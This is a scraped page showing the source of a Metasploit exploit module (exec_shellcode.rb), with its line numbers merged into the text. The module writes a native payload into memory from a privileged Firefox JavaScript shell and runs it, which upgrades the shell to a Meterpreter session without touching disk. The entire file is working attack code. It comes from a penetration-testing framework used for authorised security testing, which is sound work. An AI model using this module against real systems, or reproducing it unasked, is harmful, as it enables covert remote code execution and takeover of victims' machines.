Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/firefox/local/exec_shellcode.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##456class MetasploitModule < Msf::Exploit::Local7Rank = ExcellentRanking # Missing autodetection, but has widespread targetability89include Msf::Payload::Firefox10include Msf::Exploit::Remote::FirefoxPrivilegeEscalation1112def initialize(info={})13super(update_info(info,14'Name' => 'Firefox Exec Shellcode from Privileged Javascript Shell',15'Description' => %q{16This module allows execution of native payloads from a privileged Firefox Javascript shell.17It places the specified payload into memory, adds the necessary protection flags,18and calls it, which can be useful for upgrading a Firefox javascript shell to a Meterpreter19session without touching the disk.20},21'License' => MSF_LICENSE,22'Author' => [ 'joev' ],23'Platform' => [ 'firefox' ],24'DisclosureDate' => '2014-03-10',25'Targets' => [26[27'Native Payload', {28'Platform' => %w{ linux osx win unix },29'Arch' => ARCH_ALL30}31]32],33'DefaultTarget' => 034))3536register_options([37OptInt.new('TIMEOUT', [true, "Maximum time (seconds) to wait for a response", 90])38])39end4041def exploit42print_status "Running the Javascript shell..."43session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")44results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])45print_warning(results) if results.present?46end4748def js_payload49%Q|50(function(send){51try {52#{run_payload}53send("Payload executed.");54} catch (e) {55send(e);56}57})(send);58|.strip59end60end616263